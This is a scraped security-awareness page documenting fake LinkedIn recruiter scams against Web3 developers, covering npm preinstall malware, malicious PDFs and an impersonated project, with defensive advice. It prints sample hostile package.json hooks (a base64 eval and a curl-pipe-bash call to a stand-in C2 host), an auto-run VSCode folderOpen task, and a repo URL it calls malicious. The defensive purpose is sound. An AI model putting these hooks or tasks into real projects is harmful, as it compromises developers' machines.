Real-world documentation of sophisticated "long-con" recruitment scams targeting Web3 & fullstack developers on LinkedIn. Three confirmed attack vectors. Three real personas.
Run this before responding to ANY unsolicited recruiter message
kurulabs.org vs the real domain).
Verify via official
social media.
Three real attack campaigns β documented from first contact to full analysis. Click Deep Dive for technical details.
"Contagious Interview" β npm preinstall malware
staufenbiel89/dtm
Professional PDF + secondary malicious coding task
Brand hijacking of a legitimate Web3 project
APOM-DAPP Project Description β vetted safe for analysis
acroipm2.adobe.com
β
a1672.dscr.akamai.net
β
Adobe Acrobat IPM & CDN. Normal for a PDF opened in Acrobat.
8.8.8.8Google DNS52.5.13.197AWS/Adobe23.195.81.59/73Akamai184.29.30.201Akamai23.39.148.131AkamaiAll US-based Adobe/Akamai infrastructure.
PDF reader temp/cache. No .exe, .dll, or .ps1. In a malicious file, look for .exe/.dll here β οΈ
This specific PDF contacted only Adobe's own servers β standard Acrobat behavior. In a malicious PDF, these same fields would show C2 server connections, dropped .exe files, and shell command execution. Learn what normal looks like so you can spot abnormal.
Practical steps to neutralize each attack vector
Preview has zero JavaScript support. /OpenAction and /JS scripts simply don't run. Never open unsolicited PDFs in Adobe Acrobat.
Run ALL technical tests with no host volume mounts and no env vars passed in. GitHub Codespaces = instant browser-based sandbox with zero access to your local machine.
Before opening a cloned repo in VSCode, check for .vscode/tasks.json. A runOn: folderOpen task executes before you run any code.
Before any technical work, request a 15-min video call. Real recruiters welcome it. Bots and scam ops ghost immediately or cite camera problems.
git clone https://github.com/staufenbiel89/dtm.gitnpm install β preinstall hook fires immediately// π© MALICIOUS β what to look for: "scripts": { "preinstall": "node -e 'eval(Buffer.from(\"BASE64==\",\"base64\").toString())'", "postinstall": "curl https://c2-server.xyz/payload.sh | bash" } // β LEGITIMATE β what safe scripts look like: "scripts": { "build": "webpack --config webpack.config.js", "test": "jest --coverage" }
These repos include a hidden .vscode/tasks.json that fires before you run any code:
// .vscode/tasks.json { "version": "2.0.0", "tasks": [{ "label": "setup", "type": "shell", "command": "node errorHandler.js", "runOptions": { "runOn": "folderOpen" } }] }
Initial DM from "Jacinta Stewart"
Profile deactivated after reporting
package.json first.vscode/tasks.json before opening in VSCodedocker run --rm -it node:lts shPDFs are not just documents β they're containers for code. Adobe Acrobat supports a full JavaScript engine with filesystem and network access. A PDF can silently execute code the moment it opens.
/OpenAction
/JS
Confirmed fraudulent assignment
Initial outreach from "JosΓ©pha Russe"
PDF pitch details
Follow-up details and next steps
Code test assessment invitation
Additional evidence
"Hi Christopher,
Came across your work β really liked your fullstack experience, especially in Web3/DeFi.
We're building a DeFi startup focused on trading infrastructure (AMM, aggregation, perps, and AI-driven strategies)..."
| Signal | β Real Kuru Labs | π© Impersonator |
|---|---|---|
| Presence | Active on Monad, verified funding | Genusix Labs shell co. (VA) |
| Outreach | Official channels / verified founders | 3rd-degree DMs + cold email blast |
| First step | Standard technical interview | "Book HR first" via Calendly |
| Domain | Official verified domain | kurulabs.org + genusix.com |
a4c04694e8e703f30e64423d60148de58d7f6f9829f356f40acf9596b4442b57
pastebin.com, discord.com, or random C2 IPs.exe, .dll, .bat, or .ps1 files written to temp directoriescmd.exe or powershell.exe/OpenAction or /JS in the analysisVerdict: This specific file is safe for educational use. The behavior shown is standard Adobe Acrobat activity when opening a PDF. Use this report as your baseline for "normal" β anything significantly different warrants immediate investigation before proceeding.